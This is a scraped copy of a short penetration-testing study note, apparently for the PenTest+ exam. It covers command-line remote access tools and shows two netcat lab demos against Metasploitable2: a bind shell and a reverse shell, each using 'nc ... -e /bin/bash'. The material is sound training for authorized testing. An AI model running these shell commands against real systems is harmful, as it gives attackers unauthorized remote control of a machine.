zoukankan      html  css  js  c++  java

  • Penetration Test

    Remote Access Tools

    Tool Notes URL
    SSH Secure shell Included or available in most OSs
    NCAT Similar to nc, but from Nmap developers https://nmap.org/ncat/
    NETCAT Same as nc Included or available in most OSs
    Proxychains Forces TCP connections through a proxy https://github.com/haad/proxuchains
    DEMO 1

    Blind shell

    Attacker: Kali Linux Target: Metasploitable2

    Run the following commands on Target VM.

    nc -lvp 4444 -e /bin/bash

    image-20201117201308500

    Then Run the following commands on Attacker VM.

    nc 10.0.0.21 4444

    image-20201117201347921

    image-20201117201427083

    DEMO 2

    Reverse shell

    Attacker: Kali Linux Target: Metasploitable2

    Run the following commands on Attacker VM.

    nc -lvp 4444

    image-20201117202158176

    Then Run the following commands on Target VM.

    nc 10.0.0.18 4444 -e /bin/bash

    image-20201117202239998

    image-20201117202319728

    QUICK REVIEW
    • There are multiple ways to leverage remote connections
    • The PenTests exam focuses on command-line tools for remote access
    • Remote access is often followed by privilege escalation attacks and/or preceded by credential attacks
    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    文字
    <script type="text/x-template"> 模板
    防xss攻击
    url
    symmfony
    composer
    header 和http状态码
    bootstrap
    linux的设置ip连接crt,修改主机名,映射,建文件
    Centos上传下载小工具lrzsz
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/13996281.html
Copyright © 2011-2022 走看看